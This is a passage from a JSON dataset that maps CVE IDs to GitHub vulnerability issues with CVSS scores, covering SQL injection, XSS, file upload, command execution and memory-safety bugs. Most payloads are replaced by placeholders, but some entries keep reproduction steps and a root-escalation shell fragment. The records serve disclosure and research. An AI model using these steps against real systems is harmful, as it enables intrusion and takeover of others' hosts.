  75408. "description": "APITAG Bugs] SQL Injection. SQL injection exists in the PATHTAG file. There is no effective defense against the comment field, leading to SQL injection attacks. The link is: APITAG Vulnerable parameter id SQL injection payload CODETAG CODETAG APITAG The problematic code CODETAG",
  75409. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  75410. "severity": "HIGH",
  75411. "baseScore": 7.5,
  75412. "impactScore": 3.6,
  75413. "exploitabilityScore": 3.9
  75414. },
  75415. {
  75416. "CVE_ID": "CVE-2021-45806",
  75417. "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/166",
  75418. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/166",
  75419. "Repo_new": "jpressprojects/jpress",
  75420. "Issue_Created_At": "2022-01-09T08:23:43Z",
  75421. "description": "jpress\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u6a21\u677f\u4fee\u6539. \u5ba1\u8ba1\u8fc7\u7a0b APITAG APITAG APITAG ERRORTAG \u6548\u679c\u6f14\u793a APITAG FILETAG \u70b9\u51fb\u66f4\u65b0\u6587\u4ef6 FILETAG \u8bbf\u95ee URLTAG \uff0c\u8ba1\u7b97\u5668\u5f39\u51fa\uff0c\u9a8c\u8bc1\u6210\u529f FILETAG",
  75422. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  75423. "severity": "HIGH",
  75424. "baseScore": 8.8,
  75425. "impactScore": 5.9,
  75426. "exploitabilityScore": 2.8
  75427. },
  75428. {
  75429. "CVE_ID": "CVE-2021-45807",
  75430. "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/167",
  75431. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/167",
  75432. "Repo_new": "jpressprojects/jpress",
  75433. "Issue_Created_At": "2022-01-09T08:36:56Z",
  75434. "description": "jfinal\u540e\u53f0\u5b58\u5728\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e \u6076\u610f\u63d2\u4ef6. \u5ba1\u8ba1\u8fc7\u7a0b jpress\u540e\u53f0\u63d0\u4f9b\u4e86\u63d2\u4ef6\u5b89\u88c5\u529f\u80fd\uff0c\u5728 APITAG \u7684 APITAG \u65b9\u6cd5\uff0c\u8be5\u65b9\u6cd5\u7684\u4f5c\u7528\u662f\u5148\u5904\u7406\u6587\u4ef6\u4e0a\u4f20\uff0c\u7136\u540e\u8fdb\u884c\u63d2\u4ef6\u5b89\u88c5 FILETAG \u6587\u4ef6\u4e0a\u4f20\u7684\u6b65\u9aa4\u7565\uff0c\u76f4\u63a5\u770b\u5b89\u88c5\u90e8\u5206 FILETAG \u8ddf\u8fdb APITAG \u65b9\u6cd5\uff0c\u5728\u8fd9\u4e2a\u65b9\u6cd5\u4e2d\uff0c\u5148\u8c03\u7528\u4e86\u4e00\u4e0b APITAG \u8bfb\u53d6\u63d2\u4ef6\u4fe1\u606f FILETAG \u8ddf\u8fdb APITAG \uff0c\u5728\u8fd9\u4e2a\u65b9\u6cd5\u91cc\u9762\u4f1a\u521b\u5efa\u4e00\u4e2a\u7c7b\u52a0\u8f7d\u5668\u6765\u52a0\u8f7d\u63d2\u4ef6\u91cc\u7684\u7c7b FILETAG \u8ddf\u8fdb APITAG APITAG \u5148\u52a0\u8f7d\u7c7b FILETAG APITAG FILETAG \u63a5\u4e0b\u6765\u5728\u5904\u7406\u8bf7\u6c42\u65f6\u5c31\u4f1a\u5229\u7528\u5230\u8fd9\u4e9bcontroller NUMBERTAG FILETAG FILETAG NUMBERTAG FILETAG NUMBERTAG URLTAG FILETAG",
  75435. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75436. "severity": "CRITICAL",
  75437. "baseScore": 9.8,
  75438. "impactScore": 5.9,
  75439. "exploitabilityScore": 3.9
  75440. },
  75441. {
  75442. "CVE_ID": "CVE-2021-45808",
  75443. "Issue_Url_old": "https://github.com/JPressProjects/jpress/issues/173",
  75444. "Issue_Url_new": "https://github.com/jpressprojects/jpress/issues/173",
  75445. "Repo_new": "jpressprojects/jpress",
  75446. "Issue_Created_At": "2022-01-09T08:55:24Z",
  75447. "description": "jpress\u524d\u53f0\u5b58\u5728\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e. FILETAG",
  75448. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  75449. "severity": "HIGH",
  75450. "baseScore": 8.8,
  75451. "impactScore": 5.9,
  75452. "exploitabilityScore": 2.8
  75453. },
  75454. {
  75455. "CVE_ID": "CVE-2021-45809",
  75456. "Issue_Url_old": "https://github.com/yuezk/GlobalProtect-openconnect/issues/113",
  75457. "Issue_Url_new": "https://github.com/yuezk/globalprotect-openconnect/issues/113",
  75458. "Repo_new": "yuezk/globalprotect-openconnect",
  75459. "Issue_Created_At": "2021-12-21T13:35:33Z",
  75460. "description": "Trivially Exploitable Privilege Escalation Vulnerability. The way APITAG Openconnect is set up enables arbitrary users to execute commands as root NUMBERTAG Install the payload; in this case, a demonstration payload installing itself to PATHTAG echo e ' PATHTAG NUMBERTAG PATHTAG a NUMBERTAG PATHTAG > /tmp/groot; bash /tmp/groot NUMBERTAG Specify openconnect parameters: APITAG NUMBERTAG Log into any VPN service This vulnerability can be executed by any user, even a \"nobody\" user covertly by sending commands to the APITAG . This vulnerability can be executed by a user with keyboard access to install a rootkit using the GUI you provided. This vulnerability can be executed as soon as openconnect globalprotect is installed; even if the APITAG systemd service has not been started as the unit file specifies: APITAG . I had to explicitly mask the service to mitigate the vulnerability. As such, it leaves any host that even has the program installed highly vulnerable; this is the worst case among privilege escalation vulnerabilities. For a secure by default configuration, openconnect global needs to be updated, so administrator approval is needed to allow specific globalprotect servers or a change in command line parameters. I propose a root editable configuration file /etc/openconnect APITAG with the following syntax karolin . APITAG i cupdev PATHTAG This entry allows the user karolin to connect to any vpn servers with a domain suffix APITAG and the specified openconnect parameters. Groups may be specified by prefixing the user with APITAG . The app could implement a config editing feature, allowing users to edit the configuration graphically after specifying the administrator password. I would also suggest disabling systemd dbus activation altogether just to avoid the entire issue of a security bug sticking around even with a stopped unit. Thank you for all your hard work!",
  75461. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75462. "severity": "CRITICAL",
  75463. "baseScore": 9.8,
  75464. "impactScore": 5.9,
  75465. "exploitabilityScore": 3.9
  75466. },
  75467. {
  75468. "CVE_ID": "CVE-2021-45810",
  75469. "Issue_Url_old": "https://github.com/yuezk/GlobalProtect-openconnect/issues/114",
  75470. "Issue_Url_new": "https://github.com/yuezk/globalprotect-openconnect/issues/114",
  75471. "Repo_new": "yuezk/globalprotect-openconnect",
  75472. "Issue_Created_At": "2021-12-21T13:37:56Z",
  75473. "description": "Easy to exploit host traffic redirection vulnerability. Joining a VPN does not require administrator access; a malicious party hosting any openconnect server can redirect the host's network traffic through their own server. This vulnerability is executed by\u2026simply logging into their own server. The same preconditions apply as to NUMBERTAG Note that hosting a global protect server is not necessary, if commands are sent directly to the DBUS service. In this case, hosting any openconnect supported VPN server will suffice. Proposed Fix See NUMBERTAG as both vulnerabilities have the same fix.",
  75474. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  75475. "severity": "HIGH",
  75476. "baseScore": 7.5,
  75477. "impactScore": 3.6,
  75478. "exploitabilityScore": 3.9
  75479. },
  75480. {
  75481. "CVE_ID": "CVE-2021-45821",
  75482. "Issue_Url_old": "https://github.com/btiteam/xbtit-3.1/issues/6",
  75483. "Issue_Url_new": "https://github.com/btiteam/xbtit-3.1/issues/6",
  75484. "Repo_new": "btiteam/xbtit-3.1",
  75485. "Issue_Created_At": "2021-12-22T20:18:47Z",
  75486. "description": "Blind SQL Injection affecting Xbtit NUMBERTAG and APITAG NUMBERTAG Description A blind SQL Injection vulnerability exists in Xbtit NUMBERTAG and APITAG NUMBERTAG ia the sid parameter (GET) in FILETAG file that is accessible by a simple registered user with default privileges. As a result a malicious user can extract sensitive data such as usernames and passwords and in some cases use this vulnerability in order to gain remote code execution. FILETAG APITAG NUMBERTAG FILETAG sid parameter) affecting Xbtit NUMBERTAG and APITAG NUMBERTAG Login as a simple user make a comment in the chat box. The sid parameter is vulnerable to an authenticated blind SQL injection. Use the following APITAG and cause a sleep delay for NUMBERTAG seconds to manually test if the vulnerability exists. Note that you must be logged in as a simple user and the sid parameter must be a valid chat message id you have already generated! APITAG FILETAG FILETAG FILETAG FILETAG APITAG APITAG APITAG NUMBERTAG is also affected by the same issue. APITAG NUMBERTAG FILETAG msgid parameter) affecting only APITAG NUMBERTAG APITAG NUMBERTAG has additionally functionality on the file named ( FILETAG ) that has a vulnerable GET\u00a0id parameter (msgid) that offers almost similar functionality. So we can apply the same on /chatedit.php instead of FILETAG and msgid (GET) instead of sid (GET) parameter. The following APITAG will cause a sleep delay for NUMBERTAG seconds to manually test if the vulnerability exists. Note that you must be logged in as a simple user and the msgid parameter must be a valid chat message id you have already generated. APITAG FILETAG",
  75487. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  75488. "severity": "HIGH",
  75489. "baseScore": 8.8,
  75490. "impactScore": 5.9,
  75491. "exploitabilityScore": 2.8
  75492. },
  75493. {
  75494. "CVE_ID": "CVE-2021-45822",
  75495. "Issue_Url_old": "https://github.com/btiteam/xbtit-3.1/issues/7",
  75496. "Issue_Url_new": "https://github.com/btiteam/xbtit-3.1/issues/7",
  75497. "Repo_new": "btiteam/xbtit-3.1",
  75498. "Issue_Created_At": "2021-12-22T20:25:58Z",
  75499. "description": "Stored & Reflected XSS affecting Xbtit NUMBERTAG and APITAG NUMBERTAG Reflected XSS The / FILETAG ?page=torrent details is actually FILETAG called through page parameter from APITAG The id parameter (GET ) is vulnerable to Reflected XSS. The APITAG contains the following xss payload ERRORTAG FILETAG FILETAG Stored XSS The FILETAG page is vulnerable to Stored XSS through the n parameter (POST). This is the modified POST request to send a message to the chat box that contains the following APITAG XSS payload appended to the n parameter (POST) in URL encoded format that contains the username of the user that will post the message. ERRORTAG FILETAG FILETAG FILETAG",
  75500. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  75501. "severity": "MEDIUM",
  75502. "baseScore": 6.1,
  75503. "impactScore": 2.7,
  75504. "exploitabilityScore": 2.8
  75505. },
  75506. {
  75507. "CVE_ID": "CVE-2021-45829",
  75508. "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1317",
  75509. "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1317",
  75510. "Repo_new": "hdfgroup/hdf5",
  75511. "Issue_Created_At": "2021-12-18T13:57:17Z",
  75512. "description": "segmentation fault in h5stat. Version: APITAG System information APITAG command: APITAG FILETAG result segmentation fault ASAN information CODETAG",
  75513. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75514. "severity": "MEDIUM",
  75515. "baseScore": 5.5,
  75516. "impactScore": 3.6,
  75517. "exploitabilityScore": 1.8
  75518. },
  75519. {
  75520. "CVE_ID": "CVE-2021-45830",
  75521. "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1314",
  75522. "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1314",
  75523. "Repo_new": "hdfgroup/hdf5",
  75524. "Issue_Created_At": "2021-12-18T13:32:06Z",
  75525. "description": "heap buffer overflow APITAG PATHTAG Version: APITAG System information APITAG command: APITAG FILETAG result segmentation fault ASAN information ERRORTAG",
  75526. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75527. "severity": "MEDIUM",
  75528. "baseScore": 5.5,
  75529. "impactScore": 3.6,
  75530. "exploitabilityScore": 1.8
  75531. },
  75532. {
  75533. "CVE_ID": "CVE-2021-45831",
  75534. "Issue_Url_old": "https://github.com/gpac/gpac/issues/1990",
  75535. "Issue_Url_new": "https://github.com/gpac/gpac/issues/1990",
  75536. "Repo_new": "gpac/gpac",
  75537. "Issue_Created_At": "2021-12-14T11:19:27Z",
  75538. "description": "Null Pointer Dereference in __strlen_a NUMBERTAG Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue thank you! FILETAG Result APITAG Gdb information CODETAG",
  75539. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75540. "severity": "MEDIUM",
  75541. "baseScore": 5.5,
  75542. "impactScore": 3.6,
  75543. "exploitabilityScore": 1.8
  75544. },
  75545. {
  75546. "CVE_ID": "CVE-2021-45832",
  75547. "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1315",
  75548. "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1315",
  75549. "Repo_new": "hdfgroup/hdf5",
  75550. "Issue_Created_At": "2021-12-18T13:38:31Z",
  75551. "description": "stack overflow at PATHTAG Version: APITAG System information APITAG command: APITAG FILETAG result segmentation fault ASAN information ERRORTAG",
  75552. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75553. "severity": "MEDIUM",
  75554. "baseScore": 5.5,
  75555. "impactScore": 3.6,
  75556. "exploitabilityScore": 1.8
  75557. },
  75558. {
  75559. "CVE_ID": "CVE-2021-45833",
  75560. "Issue_Url_old": "https://github.com/HDFGroup/hdf5/issues/1313",
  75561. "Issue_Url_new": "https://github.com/hdfgroup/hdf5/issues/1313",
  75562. "Repo_new": "hdfgroup/hdf5",
  75563. "Issue_Created_At": "2021-12-18T13:08:16Z",
  75564. "description": "stack buffer overflow at APITAG PATHTAG Version: APITAG System information APITAG command: APITAG FILETAG ASAN information ERRORTAG",
  75565. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75566. "severity": "MEDIUM",
  75567. "baseScore": 5.5,
  75568. "impactScore": 3.6,
  75569. "exploitabilityScore": 1.8
  75570. },
  75571. {
  75572. "CVE_ID": "CVE-2021-45834",
  75573. "Issue_Url_old": "https://github.com/opendocman/opendocman/issues/330",
  75574. "Issue_Url_new": "https://github.com/opendocman/opendocman/issues/330",
  75575. "Repo_new": "opendocman/opendocman",
  75576. "Issue_Created_At": "2022-03-17T13:27:08Z",
  75577. "description": "Security Vulnerability Unrestricted File Upload. Describe the bug Attacker can upload files with dangerous types to the APITAG NUMBERTAG ia FILETAG using MIME bypass. File is available under specific ID, which is returned in response from application. To Reproduce Steps to reproduce the behavior NUMBERTAG Login to the application NUMBERTAG Click on APITAG Document NUMBERTAG Create a file named APITAG containing string: APITAG NUMBERTAG The document is being successfully uploaded and the APITAG header is describing the location of the file NUMBERTAG The file is available under provided ID with .dat extension under /document_repository directory. Expected behavior Application should reject the file based on the magic bytes provided. Screenshots Step NUMBERTAG Adding the document with malicious content. FILETAG Step NUMBERTAG Retrieving the content. FILETAG Versions (where applicable): APITAG NUMBERTAG APITAG NUMBERTAG PHP NUMBERTAG Web Server Type: Apache Web Server Version NUMBERTAG OS: [e.g. iOS] Kali APITAG Browser [e.g. chrome, safari] Firefox Browser Version [e.g NUMBERTAG esr",
  75578. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75579. "severity": "CRITICAL",
  75580. "baseScore": 9.8,
  75581. "impactScore": 5.9,
  75582. "exploitabilityScore": 3.9
  75583. },
  75584. {
  75585. "CVE_ID": "CVE-2021-45834",
  75586. "Issue_Url_old": "https://github.com/opendocman/opendocman/issues/326",
  75587. "Issue_Url_new": "https://github.com/opendocman/opendocman/issues/326",
  75588. "Repo_new": "opendocman/opendocman",
  75589. "Issue_Created_At": "2021-08-02T17:49:53Z",
  75590. "description": "Trying to get in touch regarding a security issue. Hi there, I couldn't find a APITAG in your repository and am not sure how to best contact you privately to disclose a security issue. Can you add a APITAG file with an e mail to your repository, so that our system can send you the vulnerability details? APITAG suggests that a security policy URLTAG is the best way to make sure security issues are responsibly disclosed. Once you've done that, you should receive an e mail within the next hour with more info. Thanks! (cc APITAG helper)",
  75591. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75592. "severity": "CRITICAL",
  75593. "baseScore": 9.8,
  75594. "impactScore": 5.9,
  75595. "exploitabilityScore": 3.9
  75596. },
  75597. {
  75598. "CVE_ID": "CVE-2021-45835",
  75599. "Issue_Url_old": "https://github.com/rskoolrash/Online-Admission-System/issues/2",
  75600. "Issue_Url_new": "https://github.com/rskoolrash/online-admission-system/issues/2",
  75601. "Repo_new": "rskoolrash/online-admission-system",
  75602. "Issue_Created_At": "2021-12-23T12:27:37Z",
  75603. "description": "Security Vulnerability. Hello, I'm trying to reach you regarding security vulnerability I have found in your application. Can you add a APITAG file with an e mail to your repository, so that our system can send you the vulnerability details? APITAG suggests that a security policy is the best way to make sure security issues are responsibly disclosed. Once you've done that, you should receive an e mail within the next hour with more info. Thanks!",
  75604. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  75605. "severity": "CRITICAL",
  75606. "baseScore": 9.8,
  75607. "impactScore": 5.9,
  75608. "exploitabilityScore": 3.9
  75609. },
  75610. {
  75611. "CVE_ID": "CVE-2021-45846",
  75612. "Issue_Url_old": "https://github.com/slic3r/Slic3r/issues/5117",
  75613. "Issue_Url_new": "https://github.com/slic3r/slic3r/issues/5117",
  75614. "Repo_new": "slic3r/slic3r",
  75615. "Issue_Created_At": "2021-12-26T17:21:29Z",
  75616. "description": "NULL pointer dereference in AMF XML parser (metadata tag without type attribute). Summary A crafted AMF XML document can cause a crash due to a NULL pointer dereference during parsing. Vulnerable versions Slic3r (commit APITAG Step to reproduce NUMBERTAG Create the proof of concept OBJ file ( APITAG ): APITAG NUMBERTAG Execute APITAG NUMBERTAG Observe segmentation fault. Cause An attempt is made to read the type attribute of the APITAG tag, at APITAG URLTAG . The APITAG contains a metadata tag without a type attribute. APITAG returns NULL, and thus the creation of the APITAG crashes. Impact Denial of Service. Proposed mitigation Check for NULL before trying to construct the APITAG , set a default value or reject the tag. Similar checks are already in place at line NUMBERTAG URLTAG and others.",
  75617. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75618. "severity": "MEDIUM",
  75619. "baseScore": 5.5,
  75620. "impactScore": 3.6,
  75621. "exploitabilityScore": 1.8
  75622. },
  75623. {
  75624. "CVE_ID": "CVE-2021-45847",
  75625. "Issue_Url_old": "https://github.com/slic3r/Slic3r/issues/5118",
  75626. "Issue_Url_new": "https://github.com/slic3r/slic3r/issues/5118",
  75627. "Repo_new": "slic3r/slic3r",
  75628. "Issue_Created_At": "2021-12-26T20:32:19Z",
  75629. "description": "NULL pointer dereference in NUMBERTAG MF XML parser (vertex tag without PATHTAG attribute). Summary A crafted NUMBERTAG MF XML document can cause a crash due to a NULL pointer dereference during parsing. Vulnerable versions Slic3r (commit APITAG Step to reproduce NUMBERTAG Create the proof of concept OBJ file ( APITAG ): CODETAG NUMBERTAG Pack the file into a zip archive together with the prerequisite other files from a NUMBERTAG mf file: APITAG NUMBERTAG Rename the zip archive to APITAG NUMBERTAG Execute APITAG NUMBERTAG Observe segmentation fault. Example file FILETAG Cause APITAG in TMF.cpp returns NULL if the sought attribute is missing. The NULL check at APITAG URLTAG is ineffective, since APITAG does not terminate the current function. Execution continues to line NUMBERTAG where strtof receives a NULL pointer input, and a crash results. Impact Denial of Service. Proposed mitigation Throw an exception in APITAG to ensure that file parsing stops immediately.",
  75630. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75631. "severity": "MEDIUM",
  75632. "baseScore": 5.5,
  75633. "impactScore": 3.6,
  75634. "exploitabilityScore": 1.8
  75635. },
  75636. {
  75637. "CVE_ID": "CVE-2021-45847",
  75638. "Issue_Url_old": "https://github.com/slic3r/Slic3r/issues/5119",
  75639. "Issue_Url_new": "https://github.com/slic3r/slic3r/issues/5119",
  75640. "Repo_new": "slic3r/slic3r",
  75641. "Issue_Created_At": "2021-12-26T20:37:00Z",
  75642. "description": "NULL pointer dereference in NUMBERTAG MF XML parser (triangle tag without PATHTAG attribute). Summary A crafted NUMBERTAG MF XML document can cause a crash due to a NULL pointer dereference during parsing. Vulnerable versions Slic3r (commit APITAG Step to reproduce NUMBERTAG Create the proof of concept OBJ file ( APITAG ): CODETAG NUMBERTAG Pack the file into a zip archive together with the prerequisite other files from a NUMBERTAG mf file: APITAG NUMBERTAG Rename the zip archive to APITAG NUMBERTAG Execute APITAG NUMBERTAG Observe segmentation fault. Example file FILETAG Cause APITAG in TMF.cpp returns NULL if the sought attribute is missing. The NULL check at APITAG URLTAG is ineffective, since APITAG does not terminate the current function. Execution continues to line NUMBERTAG where atoi receives a NULL pointer input, and a crash results. Impact Denial of Service. Proposed mitigation Throw an exception in APITAG to ensure that file parsing stops immediately.",
  75643. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75644. "severity": "MEDIUM",
  75645. "baseScore": 5.5,
  75646. "impactScore": 3.6,
  75647. "exploitabilityScore": 1.8
  75648. },
  75649. {
  75650. "CVE_ID": "CVE-2021-45847",
  75651. "Issue_Url_old": "https://github.com/slic3r/Slic3r/issues/5120",
  75652. "Issue_Url_new": "https://github.com/slic3r/slic3r/issues/5120",
  75653. "Repo_new": "slic3r/slic3r",
  75654. "Issue_Created_At": "2021-12-26T20:44:57Z",
  75655. "description": "NULL pointer dereference in NUMBERTAG MF XML parser (slic3r:volume tag without PATHTAG attribute). Summary A crafted NUMBERTAG MF XML document can cause a crash due to a NULL pointer dereference during parsing. Vulnerable versions Slic3r (commit APITAG Step to reproduce NUMBERTAG Create the proof of concept OBJ file ( APITAG ): CODETAG NUMBERTAG Pack the file into a zip archive together with the prerequisite other files from a NUMBERTAG mf file: APITAG NUMBERTAG Rename the zip archive to APITAG NUMBERTAG Execute APITAG NUMBERTAG Observe segmentation fault. Example file FILETAG Cause APITAG in TMF.cpp returns NULL if the sought attribute is missing. The constructor of APITAG is invoked implicitly, leading to a crash ( APITAG ). The check at APITAG URLTAG is ineffective, since it occurs after the NULL pointer is dereferenced. Impact Denial of Service. Proposed mitigation Perform a NULL check on the return values from APITAG before constructing strings from them. Ensure that the NULL check terminates parsing, as proposed in NUMBERTAG and NUMBERTAG",
  75656. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75657. "severity": "MEDIUM",
  75658. "baseScore": 5.5,
  75659. "impactScore": 3.6,
  75660. "exploitabilityScore": 1.8
  75661. },
  75662. {
  75663. "CVE_ID": "CVE-2021-45848",
  75664. "Issue_Url_old": "https://github.com/nicotine-plus/nicotine-plus/issues/1777",
  75665. "Issue_Url_new": "https://github.com/nicotine-plus/nicotine-plus/issues/1777",
  75666. "Repo_new": "nicotine-plus/nicotine-plus",
  75667. "Issue_Created_At": "2021-12-22T17:11:07Z",
  75668. "description": "Just crashed on Win NUMBERTAG insider ring. Type: <class ERRORTAG Value: access: embedded null character in path Traceback: File APITAG line NUMBERTAG in network_event File APITAG line NUMBERTAG in queue_upload File APITAG line NUMBERTAG in queue_upload File APITAG line NUMBERTAG in file_is_shared",
  75669. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  75670. "severity": "HIGH",
  75671. "baseScore": 7.5,
  75672. "impactScore": 3.6,
  75673. "exploitabilityScore": 3.9
  75674. },
  75675. {
  75676. "CVE_ID": "CVE-2021-45852",
  75677. "Issue_Url_old": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/6",
  75678. "Issue_Url_new": "https://github.com/projectworldsofficial/hospital-management-system-in-php/issues/6",
  75679. "Repo_new": "projectworldsofficial/hospital-management-system-in-php",
  75680. "Issue_Created_At": "2021-12-23T13:36:14Z",
  75681. "description": "Unauthorized adding patient in FILETAG . Version NUMBERTAG No login is required Steps to reproduce APITAG the data packet as APITAG can see that there is no cookie. FILETAG APITAG logging in, I found that the addition was successful FILETAG Source code review FILETAG line NUMBERTAG FILETAG Enter the APITAG function FILETAG The problem is that although the redirection is made, APITAG is not executed, causing the code below to continue executing. FILETAG Succeeded in adding patient without authorization",
  75682. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  75683. "severity": "MEDIUM",
  75684. "baseScore": 5.3,
  75685. "impactScore": 1.4,
  75686. "exploitabilityScore": 3.9
  75687. },
  75688. {
  75689. "CVE_ID": "CVE-2021-45860",
  75690. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/510",
  75691. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/510",
  75692. "Repo_new": "justdan96/tsmuxer",
  75693. "Issue_Created_At": "2021-12-21T08:53:16Z",
  75694. "description": "An Integer Overflow in APITAG Hi, I found an integer overflow in APITAG URLTAG POC FILETAG With this poc, the buffer is too small but the condition on line NUMBERTAG still evaluates to true. gdb ERRORTAG",
  75695. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75696. "severity": "MEDIUM",
  75697. "baseScore": 5.5,
  75698. "impactScore": 3.6,
  75699. "exploitabilityScore": 1.8
  75700. },
  75701. {
  75702. "CVE_ID": "CVE-2021-45861",
  75703. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/478",
  75704. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/478",
  75705. "Repo_new": "justdan96/tsmuxer",
  75706. "Issue_Created_At": "2021-10-18T14:29:17Z",
  75707. "description": "Assertion Failed in APITAG APITAG Hi, I Found an Assertion Failed error. Some info: APITAG To reproduce NUMBERTAG Compile APITAG NUMBERTAG Run tsmuxer ERRORTAG POC FILETAG gdb output ERRORTAG",
  75708. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75709. "severity": "MEDIUM",
  75710. "baseScore": 5.5,
  75711. "impactScore": 3.6,
  75712. "exploitabilityScore": 1.8
  75713. },
  75714. {
  75715. "CVE_ID": "CVE-2021-45863",
  75716. "Issue_Url_old": "https://github.com/justdan96/tsMuxer/issues/509",
  75717. "Issue_Url_new": "https://github.com/justdan96/tsmuxer/issues/509",
  75718. "Repo_new": "justdan96/tsmuxer",
  75719. "Issue_Created_At": "2021-12-21T08:06:40Z",
  75720. "description": "heap buffer overflow in APITAG APITAG Hi, I found a heap buffer overflow error. Some Info APITAG To reproduce NUMBERTAG Compile APITAG NUMBERTAG run tsmuxer APITAG Asan output ERRORTAG POC FILETAG",
  75721. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  75722. "severity": "MEDIUM",
  75723. "baseScore": 5.5,
  75724. "impactScore": 3.6,
  75725. "exploitabilityScore": 1.8
  75726. },
  75727. {
  75728. "CVE_ID": "CVE-2021-45884",
  75729. "Issue_Url_old": "https://github.com/brave/brave-browser/issues/20079",
  75730. "Issue_Url_new": "https://github.com/brave/brave-browser/issues/20079",
  75731. "Repo_new": "brave/brave-browser",
  75732. "Issue_Created_At": "2021-12-13T20:42:44Z",
  75733. "description": "Desktop] Release notes for APITAG . Improve formatting of input values (send and swap NUMBERTAG URLTAG Full Fiat Balance not showing with ERC NUMBERTAG tokens NUMBERTAG URLTAG Update default widget list for desktop NUMBERTAG URLTAG it is possible to delete the active network on PATHTAG NUMBERTAG URLTAG Changes to sync QR code NUMBERTAG URLTAG Make APITAG screen working on both APITAG devices NUMBERTAG URLTAG Double click by APITAG buttons for Trezor transactions closes wallet panel NUMBERTAG URLTAG We aren\u2019t displaying asset balances until we get prices for them, we should NUMBERTAG URLTAG Don't treat unknown balances as NUMBERTAG show N/A instead NUMBERTAG ERRORTAG URLTAG Make the front end use the default currency and default cryptocurrency from settings NUMBERTAG URLTAG Link for IPFS preference settings page is hidden for some window sizes NUMBERTAG URLTAG Update NTP Background Images component for Fall NUMBERTAG wallpapers on desktop NUMBERTAG URLTAG hackerone NUMBERTAG CNAME Uncloacking in SOCKS5 protocol NUMBERTAG URLTAG Brave reading PATHTAG NUMBERTAG URLTAG Add menu to allow to edit/remove networks on wallet page NUMBERTAG URLTAG Allow folks to enable File System API with a Flag NUMBERTAG URLTAG Clicking Solve on adaptive captcha Brave Ads paused modal sometimes yields no action NUMBERTAG URLTAG Add Google's new iOS URL parameters to the query string filter NUMBERTAG URLTAG Implement APITAG and in particular APITAG version of EIP NUMBERTAG URLTAG Implement Rewards settings section inside brave://settings NUMBERTAG URLTAG hackerone] Strip referrer and origin in cross origin requests from a .onion origin NUMBERTAG URLTAG Re enable the post uninstall survey on Windows NUMBERTAG URLTAG Implement new Rewards NTP Widget NUMBERTAG design NUMBERTAG URLTAG Use error modals in Brave Rewards settings page instead of error notifications for linking related errors (convert these notifications to error modals NUMBERTAG URLTAG Unable to go backwards on IPFS pages when automatic APITAG redirection is enabled NUMBERTAG URLTAG",
  75734. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  75735. "severity": "HIGH",
  75736. "baseScore": 7.5,
  75737. "impactScore": 3.6,
  75738. "exploitabilityScore": 3.9
  75739. },
  75740. {
  75741. "CVE_ID": "CVE-2021-45884",
  75742. "Issue_Url_old": "https://github.com/brave/brave-browser/issues/19070",
